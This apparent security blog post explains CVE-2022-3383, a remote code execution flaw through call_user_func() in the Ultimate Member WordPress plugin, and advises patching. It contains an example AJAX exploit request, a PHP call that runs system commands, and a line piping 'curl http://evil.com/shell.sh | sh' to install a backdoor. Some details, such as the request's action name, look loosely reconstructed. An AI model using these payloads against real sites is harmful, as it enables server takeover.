CVE-2022-3383 - How Exploiting a Simple Callback in Ultimate Member Leads to Remote Code Execution

If your website relies on WordPress plugins, it’s crucial to stay updated on security risks. Today, let’s talk about CVE-2022-3383, a vulnerability in the Ultimate Member plugin (<= 2.5.). This flaw lets attackers run code on your server if they’ve got admin access—a dangerous combination caused by an unsafe use of call_user_func(). Here’s how it works, why it’s dangerous, and how hackers can exploit it.

What is Ultimate Member?

Ultimate Member is a popular WordPress plugin for managing user profiles and memberships. With over 200,000 active installations, it’s a big target.

Access Required: Authenticated admin-level user

The issue exists in the get_option_value_from_callback() function, where user-supplied input is blindly fed into call_user_func(). That means attacker-controlled data becomes the function WordPress executes—opening the door to code execution.

Where’s the Flaw?

Let’s look at a simplified form of the vulnerable code in /includes/core/class-admin-settings.php:

// Vulnerable function
public static function get_option_value_from_callback( $callback, $option_name ) {
    // No sanitization or restriction!
    return call_user_func( $callback, $option_name );
}

Here, $callback can be user-supplied, and _anything_ can get passed in for PHP to execute.

How is this function triggered?

Attackers can reach get_option_value_from_callback() through settings pages, AJAX, or other admin-level actions Ultimate Member provides.

Example Exploit

Important: Only admins can exploit this directly—so an attacker either needs to compromise an admin account or escalate privileges by other means.

Let’s suppose an attacker submits the following payload

// Example malicious callback
$payload = 'system';
// Option name could be any command, depending on context
$option_name = 'id';

// This leads to:
call_user_func('system', 'id'); // Executes 'id' command on the server

The output of id (revealing server info) would be displayed/processed. Worse: an attacker could use system('curl http://evil.com/shell.sh | sh') to install a backdoor.

Here’s how you might craft a request using a tool like Burp Suite or with custom code

POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in...

action=get_option_value_from_callback
callback=system
option_name=ls

This AJAX request would ask WordPress to execute system("ls")—listing server files.

Why Is This Dangerous?

- RCE is as bad as it gets: Attackers could install malware, create admin users, read contents, or destroy data.
- Most plugins assume admins are honest but privilege escalation bugs often pave the way for attackers to become admin.

What Should You Do?

- Patch ASAP! Upgrade Ultimate Member to at least version 2.5.1.

References & Further Reading

- CVE-2022-3383 on NVD
- WPScan Advisory
- Ultimate Member Changelog

Conclusion

The CVE-2022-3383 vulnerability in Ultimate Member underscores why developers must never trust user input—especially when calling powerful PHP functions like call_user_func() or eval(). Always validate, sanitize, and keep your plugins up to date.

If you manage a WordPress site, check your Ultimate Member version right now and patch it if you’re affected. Better safe than sorry.


Stay Safe!
If you want more insights on WordPress security, keep following for updates and deep-dives.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 20:14:00 UTC